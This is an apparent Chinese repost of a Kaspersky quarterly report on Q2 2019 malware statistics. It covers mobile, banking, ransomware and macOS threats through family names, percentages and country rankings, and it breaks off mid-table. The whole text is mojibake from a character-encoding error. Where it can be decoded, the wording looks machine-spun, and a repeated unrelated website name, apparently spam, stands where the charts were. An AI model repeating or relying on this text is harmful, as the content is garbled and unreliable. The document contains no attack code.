¿¨°Í˹»ù2019ÄêQ2 ITÍþвÑݱäͳ¼Æ»ã±¨

°ä²¼¹¦·ò 2019-09-05

Ŀ¼



Ò»¡¢¼¾¶ÈÊý×Ö

¶þ¡¢Òƶ¯Íþв

    2.1 ¼¾¶ÈÁÁµã

     2.2 ÒÆ¶¯Íþвͳ¼Æ

    2.3 ÒÆ¶¯¶ñÒâÈí¼þµÄÀàÐÍÉ¢²¼

    2.4 ÒÆ¶¯¶ñÒâÈí¼þTop20

    2.5 ÒÆ¶¯ÍþвµÄµØÀíÉ¢²¼

         2.5.1 Êܹ¥»÷Óû§±ÈÀý×î¸ßµÄ¹ú¶ÈTop 10

     2.6 ÒøÐÐľÂí

         2.6.1 ÊÜÒøÐÐľÂí¹¥»÷±ÈÀý×î¸ßµÄ¹ú¶ÈTop10

    2.7 ÀÕË÷Èí¼þ

         2.7.1 ÒÆ¶¯ÀÕË÷Èí¼þTop10

Èý¡¢macOSÍþв

     3.1 macOSÍþвTop20

     3.2 µØÀíÉ¢²¼

ËÄ¡¢ÎïÁªÍøÍþв

     4.1 Í·ÌõÊÂÎñ

     4.2 ÎïÁªÍøÍþвͳ¼Æ

    4.3 »ùÓÚTelnetµÄ¹¥»÷

         4.3.1 Telnet¹¥»÷ÆðÔ´µÄ¹ú¶ÈÉ¢²¼Top10

         4.3.2 Telnet¹¥»÷ÖÐÏÂÔØµÄ¶ñÒâÈí¼þTop10

    4.4 »ùÓÚSSHµÄ¹¥»÷

         4.4.1 SSH¹¥»÷ÆðÔ´µÄ¹ú¶ÈÉ¢²¼Top10

Îå¡¢½ðÈÚÍþв

    5.1 ½ðÈÚÍþвͳ¼Æ 

    5.2 µØÀíÉ¢²¼

         5.2.1 Êܹ¥»÷Óû§µÄ¹ú¶ÈÉ¢²¼Top10

         5.2.2 ÒøÐжñÒâÈí¼þ¼Ò×åTop10

Áù¡¢ÀÕË÷Èí¼þ

    6.1 ¼¾¶ÈÁÁµã

     6.2 бäÖÖÊýÁ¿

    6.3 Êܹ¥»÷Óû§ÊýÁ¿

    6.4 µØÀíÉ¢²¼

        6.4.1 Êܹ¥»÷Óû§µÄ¹ú¶ÈÉ¢²¼Top 10

    6.5 ÀÕË÷Èí¼þTop10

Æß¡¢¶ñÒâ¿ó¹¤

    7.1 бäÖÖµÄÊýÁ¿

    7.2 Êܹ¥»÷Óû§ÊýÁ¿

    7.3 µØÀíÉ¢²¼

°Ë¡¢·¸×ï·Ö×Ó³Áµã¹Ø×¢µÄ´àÈõÀûÓÃ

    8.1 ͨ¹ýÍøÂç×ÊÔ´ÌáÒéµÄ¹¥»÷

         8.1.1 ÍøÂç¹¥»÷ÆðÔ´¹ú¶ÈµÄTop10

         8.1.2 Óû§Ï°È¾·çÏÕ×î¸ßµÄ¹ú¶È

    8.2 ±¾µØÍþв

         8.2.2 ±¾µØÏ°È¾·çÏÕ×î¸ßµÄ¹ú¶È





Ò»¡¢¼¾¶ÈÊý×Ö


__
__


ƾ¾ÝKSNµÄÊý¾Ý£º


  • ¿¨°Í˹»ù°²È«½â¾ö¹æ»®×èÖ¹ÁËÈ«Çò203¸ö¹ú¶ÈµÄÔÚÏß×ÊÔ´ÌáÒéµÄ717,057,912´Î¹¥»÷

  • Web·´²¡¶¾×é¼þ¼ì²âµ½217,843,293¸ö·ÖÆçµÄ¶ñÒâURL

  • ÔÚ228,206¸öÓû§µÄµçÄÔÉϼͼµ½Õë¶ÔÔÚÏßÒøÐÐÕË»§µÄ¶ñÒâÈí¼þϰȾÊÂÎñ

  • ÔÚ232,292¸öÓû§µÄµçÄÔÉÏ×èÖ¹ÁËÀÕË÷Èí¼þ¹¥»÷

  • Îļþ·´²¡¶¾ÏµÍ³¼ì²âµ½240,754,063¸ö·ÖÆçµÄ¶ñÒ⼰DZÔÚÓк¦Ñù±¾

  • ¿¨°Í˹»ùÒÆ¶¯°²È«²úÆ·¼ì²âµ½£º

    • 753,550¸ö¶ñÒâ×°Öðü

    • 13,899¸öÒøÐÐľÂí×°Öðü

    • 23,294¸öÀÕË÷Èí¼þ×°Öðü



¶þ¡¢Òƶ¯Íþв


__
__


2.1 ¼¾¶ÈÁÁµã


2019ÄêQ2Óм¸¸öÊÂÎñÖµµÃÃú¿Ì¡£


µÚÒ»¸öÊÇ£¬ÃûΪRiltokµÄ´ó¹æÄ£½ðÈÚÍþв£¬Ëü²»½öÕë¶Ô¶íÂÞ˹´óÐÍÒøÐеĿͻ§£¬»¹¶Ô׼һЩ±í¹úÒøÐеÄÓû§¡£


µÚ¶þ¸ö£¬Ð¶ñÒâÈí¼þTrojan.AndroidOS.MobOk£¬ÆäÖ¸±êÊÇͨ¹ýWAP-Click¸¶·Ñ¶©ÔÄ´ÓÊÖ»úÕÊ»§ÖÐÇÔÈ¡×ʽð¡£ÊÜϰȾÉ豸»á½øÈëÍøÂç¹ýÔØ×´Ì¬¡£¾ßÌåÀ´Ëµ£¬¸ÃľÂí»á½Ó¼ûרÃÅ´´½¨µÄ¶ñÒâÒ³Ãæ£¬ÀûÓõÚÈý·½·þÎñÈÆ¹ýÑéÖ¤Âëϵͳ²¢µã»÷°´Å¥ÊµÏÖ¶©ÔÄ¡£


µÚÈý¸ö£¬Ã³Ò×¼äµýÈí¼þ£¬ÓÖ±»³ÆÎª¸ú×ÙÈí¼þ£¨stalkerware£©£¬Í¨³£À´½²´ËÀàÈí¼þ²¢²»Äܱ»¹éÀàΪ¶ñÒâÈí¼þ£¬µ«ËüµÄÈ·»á¸øÓû§´øÀ´·çÏÕ¡£Òò¶ø´Ó4ÔÂ3ÈÕÆðÍ·£¬¿¨°Í˹»ùAndroid°²È«Èí¼þ»áÏòÓû§ÖÒ¸æËùÓÐÒÑÖªµÄóÒ×¼äµýÈí¼þ¡£


µÚËĸö£¬Ò»ÖÖÐÂÀàÐ͵ĸæ°×Èí¼þ£¨AdWare.AndroidOS.KeepMusic.aºÍAdWare.AndroidOS.KeepMusic.b£©£¬ËüÄܹ»Èƹý²Ù×÷ϵͳ¶Ôºó¶ÜÔËÐз¨Ê½µÄÏÞ¶È¡£ÎªÁËÔ¤·À¹ý³Ì±»É±ËÀ£¬ÆäÖÐÒ»¸öÑù±¾ÔÚºó¶ÜÆô¶¯ÁËÒôÀÖ²¥·ÅÆ÷£¬²¥·ÅÒ»¸öÎÞÉùµÄÎļþ£¬Ê¹µÃ²Ù×÷ϵͳÒÔΪÓû§ÔÚÌýÒôÀÖ¶ø²»É±ËÀÆä¹ý³Ì£¬ÏÖʵÉÏÔÚÉ豸µÄÖ÷ÆÁÄ»ÉÏʲôҲûÓÐÏÔʾ¡£×÷Ϊ½©Ê¬ÍøÂçµÄÒ»²¿ÃÅ£¬¸ÃÑù±¾»áÏòÓû§µ¯³ö¸æ°×£¬ÏÖʵÉÏÕâЩ¸æ°×Ò²ÊÇÔÚºó¶Üµ¯³ö£¬Óû§´Ëʱ¿ÉÄܵ××ÓûÓÐʹÓÃÉ豸¡£


µÚÎå¸ö£¬Ä¾Âí¼Ò×åHideapp£¬ÕâЩľÂíÔÚQ2»ý¼«´«²¼£¬²¢ÇÒÔ̺¬¾Ã¾­¿¼ÑéµÄ·Ö·¢»úÔ죺ѡȡɱ¶¾Èí¼þµÄlogoÒÔ¼°¼Ù×°³ÉÉ«ÇéAPP¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾



×îºó£¬ÔÚijЩ°æ±¾ÖУ¬Ä¾Âí¿ª·¢ÈËÔ±Ïò¶íÂÞ˹×î´óµÄIT¹«Ë¾Ö®Ò»µÄÖÎÀíÕßÃDZí°×Á˲»ÓÑÉÆµÄ̬¶È£º


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2.2 ÒÆ¶¯Íþвͳ¼Æ


2019ÄêQ2¿¨°Í˹»ù¹²¼ì²âµ½753,550¸ö¶ñÒâ×°Öðü£¬±ÈÉÏÒ»¼¾¶ÈÏ÷¼õÁË151,624¸ö¡£



GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2018ÄêQ3 ¨C 2019ÄêQ2£¬¶ñÒâ×°ÖðüµÄÊýÁ¿¶Ô±È



²¢ÇÒ£¬Óë2018ÄêQ2µÄÊý¾ÝÏà±ÈÕâÒ»Êý×ÖÒѾ­½µÂäÁ˽ü100Íò¡£ÕûÌå¿´À´£¬½ñÄêÒÆ¶¯Æ½Ì¨Ð¶ñÒâÈí¼þµÄ×ÜÊýÎȲ½½µÂ䣬ÕâÖÖ½µÂäÊÇÓÉÓÚ×î³£¼ûµÄ¶ñÒâÈí¼þ¼Ò×åÔ½À´Ô½ÉÙµØÔö³¤Ð³ÉÔ±ËùÖ¡£


2.3 ÒÆ¶¯¶ñÒâÈí¼þµÄÀàÐÍÉ¢²¼


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ1ºÍQ2£¬ÐÂÒÆ¶¯¶ñÒâÈí¼þµÄÀàÐÍÉ¢²¼



ÔÚ2019ÄêQ2¼ì²âµ½µÄËùÓÐÍþвÖУ¬Õ¼±È×î¸ßµÄÊÇDZÔÚÓк¦µÄ»ÒÉ«Èí¼þ£¨RiskTool£©£¬Æä·Ý¶îΪ41.24%£¬±ÈÉÏÒ»¼¾¶ÈÔö³¤ÁË11¸ö°Ù·Öµã¡£ÔÚ¸ÃÀà±ðÖУ¬×î³£¼ûµÄÑùÕý±¾×ÔÓÚRiskTool.AndroidOS.Agent¼Ò×壨ռ¸ÃÀà´ËÍâ33.07%£©£¬RiskTool.AndroidOS.Smssend£¨15.68%£©ºÍRiskTool.AndroidOS.Wapron£¨14.41%£©¡£


ÅÅÔÚµÚ¶þÃûµÄÊǸæ°×Èí¼þ£¬Æä·Ý¶îÔö³¤ÁË2.16¸ö°Ù·Öµã£¬´ï18.71%¡£¸ÃÀà±ðÖÐ×î³£¼ûµÄÑù±¾·Ö±ðÊÇAdWare.AndroidOS.Ewind£¨26.46%£©¡¢AdWare.AndroidOS.Agent£¨23.60%£©ºÍAdWare.AndroidOS.MobiDash£¨17.39%£©¡£


ľÂíÀà¶ñÒâÈí¼þ£¨11.83%£©ÅÅÃûµÚÈý£¬ÓëÉÏÒ»¼¾¶ÈÏà±ÈÔö³¤ÁË2.31¸ö°Ù·Öµã¡£¸ÃÀà±ðÑù±¾Êý×î¶àµÄÊÇTrojan.AndroidOS.Boogr¼Ò×壨32.42%£© - ÕâÒ»Ãû³Æ´úÖ¸»úе½ø½¨¹¤¾ß¼ì²âµ½µÄľÂí¡£Æä´ÎÊÇTrojan.AndroidOS.Hiddapp£¨24.18%£©¡¢Trojan.AndroidOS.Agent£¨14.58%£©ºÍTrojan.AndroidOS.Piom£¨9.73%£©¡£Çë°ÑÎÈAgentºÍPiomÊǼ¯ÖÐÀàµÄÌØµã£¬º­¸ÇÁË·ÖÆç¿ª·¢ÕßµÄһϵÁÐľÂíÑù±¾¡£


ľÂí¿ªÊÍÆ÷£¨Trojan-Dropper£©Àà±ðÏ»¬ÏÔÖø£¨10.04%£©£¬½µÂäÁË15¸ö°Ù·Öµã¡£¸ÃÀà±ðÖдóÎÞÊýÑù±¾ÊôÓÚTrojan-Dropper.AndroidOS.Wapnor¼Ò×壨71%£©£¬ÆäËü¼Ò×åµÄ·Ý¶î¾ùÓ×ÓÚ3%¡£Ò»¸öµäÐ͵ÄWapnor¼Ò×å³ÉÔ±ÓÉÒ»ÕÅËæ»úµÄÉ«ÇéͼƬ¡¢Ò»¸ö¶à̬ÐÔdropperÒÔ¼°Ò»¸ö¿ÉÖ´ÐÐÎļþ×é³É¡£¸Ã¶ñÒâÈí¼þµÄ¹¤×÷Êǰü°ìÓû§½øÐÐWAP¸¶·Ñ¶©ÔÄ¡£


2019ÄêQ2ÒøÐÐľÂí£¨banker£©µÄ·Ý¶îÇá΢½µÂ䣺1.84%£¬¶øQ1Ϊ3.21%¡£ÕâÒ»½µÂäÖØÒªÊÇÓÉÓÚAsacub¼Ò×åÐÂľÂíµÄÏ÷¼õËùÖ¡£¸ÃÀà±ð×î³£¼ûµÄÑù±¾ÊôÓÚTrojan-Banker.AndroidOS.Svpeng £¨30.79%£©¡¢Trojan-Banker.AndroidOS.Wroba£¨17.16%£©ºÍTrojan-Banker.AndroidOS.Agent£¨15.70%£©¡£


2.4 ÒÆ¶¯¶ñÒâÈí¼þTop20


Çë°ÑÎÈÅÅÃûÖв»Ô̺¬ÈκÎDZÔÚΣÏÕ»òÓꦵÄÈí¼þ£¬ÀýÈç»ÒÉ«Èí¼þºÍ¸æ°×Èí¼þ


                               ÌØµã                                                                                                %*

1

DangerousObject.Multi.Generic

44.37

2

Trojan.AndroidOS.Boogr.gsh

11.31

3

DangerousObject.AndroidOS.GenericML

5.66

4

Trojan.AndroidOS.Hiddapp.cr

4.77

5

Trojan.AndroidOS.Hiddapp.ch

4.17

6

Trojan.AndroidOS.Hiddapp.cf

2.81

7

Trojan.AndroidOS.Hiddad.em

2.53

8

Trojan-Dropper.AndroidOS.Lezok.p

2.16

9

Trojan-Dropper.AndroidOS.Hqwar.bb

2.08

10

Trojan-Banker.AndroidOS.Asacub.a

1.93

11

Trojan-Banker.AndroidOS.Asacub.snt

1.92

12

Trojan-Banker.AndroidOS.Svpeng.ak

1.91

13

Trojan.AndroidOS.Hiddapp.cg

1.89

14

Trojan.AndroidOS.Dvmap.a

1.88

15

Trojan-Dropper.AndroidOS.Hqwar.gen

1.86

16

Trojan.AndroidOS.Agent.rt

1.81

17

Trojan-SMS.AndroidOS.Prizmes.a

1.58

18

Trojan.AndroidOS.Fakeapp.bt

1.58

19

Trojan.AndroidOS.Agent.eb

1.49

20

Exploit.AndroidOS.Lotoor.be

1.46

*Êܹ¥»÷Óû§Õ¼±È

ÓëÒÔǰһÑù£¬Q2ÖÐTop20µÄµÚÒ»ÃûÊÇDangerousObject.Multi.Generic£¨44.77%£© - ÕâÒ»ÌØµã´úÖ¸ÔÆ°²È«¼¼Êõ¼ì²âµ½µÄ¶ñÒâÈí¼þ¡£µ±É±¶¾Èí¼þÊý¾Ý¿â¶Ìȱ¼ì²âijһÀà¶ñÒâÈí¼þµÄÊý¾Ý¶øÔư²È«¼¼ÊõÖÐÔ̺¬ÓйØÐÅϢʱ£¬¸Ã¼¼ÊõµÄ×÷ÓþÍ͹ÏÔ³öÀ´¡£¸ù»ùÉÏ×îеĶñÒâÑù±¾¶¼ÊÇÕâÑù¼ì²â³öÀ´µÄ¡£


µÚ¶þºÍµÚÈýÃû±ðÀëÊÇTrojan.AndroidOS.Boogr.gsh£¨11.31%£©ºÍDangerousObject.AndroidOS.GenericML£¨5.66%£©¡£ÕâЩÊÇÓÉ»úе½ø½¨ÏµÍ³¼ì²â³öµÄ¶ñÒâÑù±¾¡£


µÚËÄ¡¢µÚÎå¡¢µÚÁù¡¢µÚÆßºÍµÚÊ®ÈýÃû¾ùÓÉTrojan.AndroidOS.Hiddapp¼Ò×åµÄ³ÉÔ±»ñµÃ¡£¸ÃľÂí¼Ò×åµÄÖØÒª¹¤×÷ÊǰÂÃØ¼ÓÔØ¸æ°×£¬ÈôÊÇÓû§¼ì²âµ½Ëü£¬Ëü²»»á×èÖ¹Óû§½øÐÐɾ³ý£¬µ«Ò»ÓлúÓö¾Í»á³ÁÐÂ×°Öá£

µÚ°ËÃûÊôÓÚTrojan-Dropper.AndroidOS.Lezok.p£¨2.16%£©¡£¸ÃľÂí»áÏÔʾ¹ÌÖ´Ð͸æ°×£¬Í¨¹ý¶ÌП¶·Ñ¶©ÔÄÇÔÈ¡½ðÇ®ÒÔ¼°Îª¸÷ÀàÆ½Ì¨ÉϵÄAPPÔö³¤µã»÷Êý¡£


Hqwar dropper¼Ò×å±ðÀë»ñµÃµÚ¾Å£¨2.08%£©ºÍµÚÊ®ÎåÃû£¨1.86%£©¡£¸Ã¶ñÒâÈí¼þͨ³£ÓÃÓÚ°µ²ØÒøÐÐľÂí¡£


µÚÊ®ºÍʮһÃûÊǽðÈÚÍþвAsacub¼Ò×壺Trojan-Banker.AndroidOS.Asacub.a£¨1.93%£©ºÍTrojan-Banker.AndroidOS.Asacub.snt£¨1.92%£©¡£ÓëHqwar dropperÀàËÆ£¬¸Ã¼Ò×åÔÚ2019ÄêQ2ÃÔʧÁË´óÆ¬·Ý¶î¡£


2.5 ÒÆ¶¯ÍþвµÄµØÀíÉ¢²¼


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬Òƶ¯¶ñÒâÈí¼þϰȾµÄµØÀíÉ¢²¼




2.5.1 Êܹ¥»÷Óû§±ÈÀý×î¸ßµÄ¹ú¶ÈTop 10


                        ¹ú¶È*                                                               %**

1

ÒÁÀÊ

28.31

2

ÃϼÓÀ­¹ú

28.10

3

°¢¶û¼°ÀûÑÇ

24.77

4

°Í»ù˹̹

24.00

5

̹ɣÄáÑÇ

23.07

6

ÄáÈÕÀûÑÇ

22.69

7

Ó¡¶È

21.65

8

Ó¡¶ÈÄáÎ÷ÑÇ

18.13

9

˹ÀïÀ¼¿¨

15.96

10

¿ÏÄáÑÇ

15.38

* ²»Ô̺¬¿¨°Í˹»ùÒÆ¶¯Óû§½ÏÉٵĹú¶È£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùÒÆ¶¯Óû§ÖÐÊܹ¥»÷µÄ±ÈÀý



Q2Êܹ¥»÷ÒÆ¶¯Óû§±ÈÀý×î¸ßµÄ¹ú¶ÈÊÇÒÁÀÊ£¨28.31%£©£¬ÔÚ2019ÄêQ1ËüÅÅÔÚµÚ¶þ¡£±»ËüÈ¡´úµÄ°Í»ù˹̹£¨24%£©´Ë¿ÌÅÅÔÚµÚËÄ¡£


´óÎÞÊýÇé¿öÏ£¬ÒÁÀÊÓû§Óöµ½µÄ¸æ°×ľÂíÊÇTrojan.AndroidOS.Hiddapp.bn£¨21.08%£©ºÍDZÔÚÓк¦Èí¼þRiskTool.AndroidOS.FakGram.a£¨12.50%£© - ¸ÃÈí¼þÊÔͼÀ¹½ØTelegram̸ÌìÐÅÏ¢ ¨C ÒÔ¼°RiskTool.AndroidOS.Dnotua.yfe£¨12.29%£©¡£


ÀàËÆÓÚÒÁÀÊ£¬ÃϼÓÀ­¹ú£¨28.10%£©µÄÅÅÃûÅÊÉýÁËһλ¡£´óÎÞÊýÇé¿öÏ£¬ÃϼÓÀ­¹úµÄÓû§Óöµ½µÄÊǸ÷Àà¸æ°×Èí¼þ£¬Ô̺¬AdWare.AndroidOS.Agent.f£¨35.68%£©¡¢AdWare.AndroidOS.HiddenAd.et£¨14.88%£©ºÍAdWare.AndroidOS.Ewind.h£¨9.65%£©¡£


µÚÈýÃûÊǰ¢¶û¼°ÀûÑÇ£¨24.77%£©£¬¸Ã¹ú¶ÈÓû§×î³£Óöµ½µÄÊǸæ°×Èí¼þAdWare.AndroidOS.HiddenAd.et£¨27.15%£©¡¢AdWare.AndroidOS.Agent.f£¨14.16%£©ºÍAdWare.AndroidOS.Oimobi.a£¨8.04%£©¡£


2.6 ÒøÐÐľÂí


Ôڻ㱨ÆÚÄÚ£¬ÎÒÃǹ²¼ì²âµ½13,899¸öÒÆ¶¯ÒøÐÐľÂí×°Öðü£¬ÏÕЩÊÇ2019ÄêQ1Êý×ÖµÄÒ»°ë¡£


ÆäÖÐSvpengľÂí¼Ò×åµÄ¹±Ï××î´ó£ºÕ¼ËùÓÐÒøÐÐľÂíµÄ30.79%¡£Trojan-Banker.AndroidOS.Wroba£¨17.16%£©ºÍTrojan-Banker.AndroidOS.Agent£¨15.70%£©·ÖÁеڶþµÚÈý¡£ÃûÉùÔÚ±íµÄAsacubľÂí£¨11.98£¥£©Ö»»ñµÃÁ˵ÚÎåÃû¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2018ÄêQ3 ¨C 2019ÄêQ2£¬ÒøÐÐľÂí×°ÖðüµÄÊýÁ¿¶Ô±È


ÒÆ¶¯ÒøÐÐľÂíTop 10


                              ÌØµã                                                                                  %*

1

Trojan-Banker.AndroidOS.Asacub.a

13.64

2

Trojan-Banker.AndroidOS.Asacub.snt

13.61

3

Trojan-Banker.AndroidOS.Svpeng.ak

13.51

4

Trojan-Banker.AndroidOS.Svpeng.q

9.90

5

Trojan-Banker.AndroidOS.Agent.ep

9.37

6

Trojan-Banker.AndroidOS.Asacub.ce

7.75

7

Trojan-Banker.AndroidOS.Faketoken.q

4.18

8

Trojan-Banker.AndroidOS.Asacub.cs

4.18

9

Trojan-Banker.AndroidOS.Agent.eq

3.81

10

Trojan-Banker.AndroidOS.Faketoken.z

3.13

* Êܹ¥»÷Óû§°Ù·Ö±È



2019ÄêQ2ÒÆ¶¯ÒøÐÐľÂíTop10ÁбíÖÐTrojan-Banker.AndroidOS.AsacubµÄ±äÖÖÏÕЩռ¾ÝÁËÒ»°ëµÄµØÎ»£ºÊ®Ï¯Ö®ÖÐÕ¼¾ÝÁËËÄϯ¡£È»¶ø£¬¸Ã¼Ò×åÉÏÒ»¼¾¶ÈµÄ·¢×÷ʽ´«²¼ÔÚÕâÒ»¼¾¶È²¢Ã»ÓгÁÏÖ¡£


ͬQ1Ò»Ñù£¬Trojan-Banker.AndroidOS.Agent.eqºÍTrojan-Banker.AndroidOS.Agent.ep³É¹¦½øÈëǰʮ£»È»¶ø£¬ËüÃÇÈ´½«Ç°ÅÅϯλÈøøÁ˾ݳÆÊÇ×î¹ÅÀÏľÂí¼Ò×åµÄSvpeng¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬Òƶ¯ÒøÐÐľÂíµÄµØÀíÉ¢²¼



2.6.1 ÊÜÒøÐÐľÂí¹¥»÷±ÈÀý×î¸ßµÄ¹ú¶ÈTop10


                  ¹ú¶È*                                                                                   %**

1

ÄÏ·Ç

0.64%

2

¶íÂÞ˹

0.31%

3

Ëþ¼ª¿Ë˹̹

0.21%

4

°Ä´óÀûÑÇ

0.17%

5

ÍÁ¶úÆä

0.17%

6

ÎÚ¿ËÀ¼

0.13%

7

ÎÚ×ȱð¿Ë˹̹

0.11%

8

º«¹ú

0.11%

9

ÑÇÃÀÄáÑÇ

0.10%

10

Ó¡¶È

0.10%

* ²»Ô̺¬¿¨°Í˹»ùÒÆ¶¯Óû§½ÏÉٵĹú¶È£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùÒÆ¶¯Óû§ÖÐÊÜÒøÐÐľÂí¹¥»÷µÄ±ÈÀý



2019ÄêQ2ÄÏ·Ç£¨0.64%£©´ÓÉÏÒ»¼¾¶ÈµÄµÚËÄÃûÅÊÉýÖÁµÚһλ¡£¸Ã¹ú¶È97%µÄ¹¥»÷°¸Àý¶¼ÓëTrojan-Banker.AndroidOS.Agent.dxÓйØ¡£


¶íÂÞ˹ժµÃµÚ¶þÃû£¨0.31%£©£¬¸Ã¹ú¶È×î³£¼ûµÄľÂí¼Ò×åÊÇAsacubºÍSvpeng£ºTrojan-Banker.AndroidOS.Asacub.a£¨14.03%£©¡¢Trojan-Banker.AndroidOS.Asacub.snt£¨13.96%£©ºÍTrojan-Banker.AndroidOS.Svpeng.ak£¨13.95%£©¡£


µÚÈýÃûÊôÓÚËþ¼ª¿Ë˹̹£¨0.21%£©£¬×î³£¼ûµÄÊÇTrojan-Banker.AndroidOS.Faketoken.z£¨35.96%£©¡¢Trojan-Banker.AndroidOS.Asacub.a£¨12.92%£©ºÍTrojan- Banker.AndroidOS.Grapereh.j£¨11.80%£©¡£


2.7 ÀÕË÷Èí¼þ


2019ÄêQ2ÎÒÃǹ²¼ì²âµ½23,294¸öÒÆ¶¯ÀÕË÷Èí¼þ×°Öðü£¬±ÈÉÏÒ»¼¾¶ÈÏ÷¼õÁË4,634¸ö¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2018ÄêQ3 ¨C 2019ÄêQ2£¬Òƶ¯ÀÕË÷Èí¼þ×°ÖðüµÄÊýÁ¿¶Ô±È


2.7.1 ÒÆ¶¯ÀÕË÷Èí¼þTop10


                       ÌØµã                                                                           %*

1

Trojan-Ransom.AndroidOS.Svpeng.aj

43.90

2

Trojan-Ransom.AndroidOS.Rkor.i

11.26

3

Trojan-Ransom.AndroidOS.Rkor.h

7.81

4

Trojan-Ransom.AndroidOS.Small.as

6.41

5

Trojan-Ransom.AndroidOS.Svpeng.ah

5.92

6

Trojan-Ransom.AndroidOS.Svpeng.ai

3.35

7

Trojan-Ransom.AndroidOS.Fusob.h

2.48

8

Trojan-Ransom.AndroidOS.Small.o

2.46

9

Trojan-Ransom.AndroidOS.Pigetrl.a

2.45

10

Trojan-Ransom.AndroidOS.Small.ce

2.22

* Êܹ¥»÷Óû§°Ù·Ö±È



2019ÄêQ2´«²¼×î¿í·ºµÄÀÕË÷Èí¼þ¼Ò×åÊÇSvpeng£ºÕ¼¾ÝÁËTop10ÖеÄ3ϯ¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2ÒÆ¶¯ÀÕË÷Èí¼þµÄµØÀíÉ¢²¼



2.7.2 ÊÜÀÕË÷Èí¼þ¹¥»÷±ÈÀý×î¸ßµÄ¹ú¶ÈTop10


                         ¹ú¶È*                                                     %**

1

ÃÀ¹ú

1.58

2

¹þÈø¿Ë˹̹

0.39

3

ÒÁÀÊ

0.27

4

°Í»ù˹̹

0.16

5

É³ÌØ°¢À­²®

0.10

6

Ä«Î÷¸ç

0.09

7

¼ÓÄôó

0.07

8

Òâ´óÀû

0.07

9

ÐÂ¼ÓÆÂ

0.05

10

Ó¡¶ÈÄáÎ÷ÑÇ

0.05

* ²»Ô̺¬¿¨°Í˹»ùÒÆ¶¯Óû§½ÏÉٵĹú¶È£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùÒÆ¶¯Óû§ÖÐÊÜÒÆ¶¯ÀÕË÷Èí¼þ¹¥»÷µÄ±ÈÀý


ÓëÉÏÒ»¼¾¶ÈÒ»Ñù£¬Êܹ¥»÷Óû§±ÈÀý×î¸ßµÄ¹ú¶È˳´ÎÊÇÃÀ¹ú£¨1.58%£©¡¢¹þÈø¿Ë˹̹£¨0.39%£©ºÍÒÁÀÊ£¨0.27%£©¡£

Èý¡¢macOSÍþв

__


Q2¼ûÖ¤Á˼¸¸öÓÐȤµÄÊÂÎñ£¬ÆäÖÐÓÐÈý¸ö³ö¸ñÖµµÃ¹Ø×¢¡£


Ê×ÏÈÊÇmacOSϵͳÖÐÆØ³öÒ»¸ö¿ÉÈÆ¹ýGatekeeperºÍXProtectɨÃèµÄ·ì϶¡£ÀûÓø÷ì϶±ØÒªÊ×ÏȳÉÁ¢Ò»¸ö´æµµÎļþ£¬ÎļþÖÐÔ̺¬Ö¸ÏòÎļþµØµãµÄ¹²ÏíNFSÎļþ¼ÐµÄ·ûºÅÁ´½Ó¡£µ±´ò¿ª¸ÃÎļþʱ£¬ÏµÍ³»á×Ô¶¯ÏÂÔØ¸Ã¹²ÏíNFSÎļþ¼ÐÖеÄÎļþ£¬¶øÃ»ÓнøÐÐÈκβ鳭¡£ÀûÓø÷ì϶µÄÊ׸ö¶ñÒâÈí¼þºÜ¿ìÏÖÉí£»µ«ËùÓеļì²âÑù±¾¿´ÆðÀ´¶¼¸üÏñÊÇÒ»¸ö²âÊ԰棬¶ø²»ÊÇÏÖʵµÄ¶ñÒâÈí¼þ¡£


Æä´ÎÊÇÔÚFirefoxä¯ÀÀÆ÷Öмì²âµ½µÄËÁÒâ´úÂëÖ´Ðзì϶£¨CVE-2019-11707£¬CVE-2019-11708£©£¬ÕâÁ½¸ö·ì϶¿Éµ¼ÖÂɳºÐÌÓÒÝ¡£ÔÚÐÅÏ¢¹«¿ªºó£¬Ê׸öexpºÜ¿ì³öÏÖ£¬·¸×ï·Ö×ÓÀûÓÃÕâЩ·ì϶¿ªÊÍľÂí¼Ò×åMokesºÍWirenetµÄ³ÉÔ±¡£


×îºóÊÇÒ»¸ö·Ö·¢¶ñÒâ¿ó¹¤µÄÓÐÈ¤ÔØÌå¡£¹¥»÷ÕßÖØÒªÀûÓÃÉç½»¹¤³Ì¹¥»÷ºÍÔںϷ¨APPÖÐÖ²Èë¶ñÒâ´úÂë¡£¸üΪÓÐȤµÄÊÇ£¬¶ñÒâ´úÂëÊÇÓÉÒ»¸öQEMU·ÂÕÕÆ÷ºÍÒ»¸öÓÃÓÚÍйܿ󹤵ÄLinuxÐé¹¹»ú×é³ÉµÄ¡£Ò»µ©QEMUÔÚÊÜϰȾµÄ»úеÉÏÆô¶¯£¬¿ó¹¤¼´ÔÚ¾µÏñÖÐÔËÐС£ÕâÖÖģʽÏ൱¹Å¹Ö ¨C ÎÞÂÛÊÇQEMU»¹Êǿ󹤶¼¿÷ËðÁË´óÁ¿ÏµÍ³×ÊÔ´ ¨C ÕâÖÖľÂí²»³ÉÄܲ»±»ÈË·¢ÏÖ¡£


3.1 macOSÍþвTop20



                ÌØµã                                                                          %*

1

Trojan-Downloader.OSX.Shlayer.a

24.61

2

AdWare.OSX.Spc.a

12.75

3

AdWare.OSX.Bnodlero.t

11.98

4

AdWare.OSX.Pirrit.j

11.27

5

AdWare.OSX.Pirrit.p

8.42

6

AdWare.OSX.Pirrit.s

7.76

7

AdWare.OSX.Pirrit.o

7.59

8

AdWare.OSX.MacSearch.a

5.92

9

AdWare.OSX.Cimpli.d

5.76

10

AdWare.OSX.Mcp.a

5.39

11

AdWare.OSX.Agent.b

5.11

12

